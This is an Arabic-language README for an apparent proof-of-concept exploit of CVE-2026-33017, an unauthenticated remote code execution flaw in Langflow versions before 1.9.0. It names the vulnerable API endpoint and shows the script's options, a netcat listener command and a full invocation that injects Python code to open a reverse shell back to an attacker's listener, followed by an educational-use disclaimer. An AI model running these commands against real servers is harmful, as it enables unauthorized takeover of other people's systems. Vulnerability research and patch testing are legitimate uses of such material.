
استغلال CVE-2026-33017 | بواسطة infrar3d
تم استغلالها بواسطة infrar3d
يستهدف هذا الاستغلال البرهاني (Proof-of-Concept) ثغرة حرجة لتنفيذ الأوامر عن بُعد (RCE) في إصدارات Langflow السابقة للإصدار 1.9.0. تسمح الثغرة للمهاجمين غير المصادَق عليهم بتنفيذ أوامر نظام عشوائية عن طريق حقن كود Python خبيث عبر نقطة نهاية API الخاصة ببناء التدفقات. تكمن الثغرة في نقطة النهاية /api/v1/build_public_tmp/{flow_id}/flow endpoint، التي لا تُعقّم بشكل صحيح الكود المقدَّم من المستخدم في حقل الكود الخاص بقوالب المكونات.
python3 CVE-2026-33017.py --help
usage: CVE-2026-33017.py [-h] -u URL -f FLOW -H HOST [-P PORT]
Langflow RCE Exploit
options:
-h, --help show this help message and exit
-u, --url URL Target base URL
-f, --flow FLOW Flow ID
-H, --host HOST Listener host for reverse shell
-P, --port PORT Listener port (default: 4444)
الطرفية الأولى (المستمع):
nc -lvnp 4444
الطرفية الثانية (الاستغلال):
python3 CVE-2026-33017.py --url https://fireflowservice.example --flow abcd1234-efgh-5678-ijkl-9012mnop --host 10.10.10.10 --port 4444
هذا البرنامج وكود الإثبات البرهاني (Proof-of-Concept) مقدَّمان لأغراض تعليمية وبحثية فقط.
أنت مسؤول عن الامتثال لجميع القوانين المعمول بها. استخدمه بأخلاقية ومسؤولية.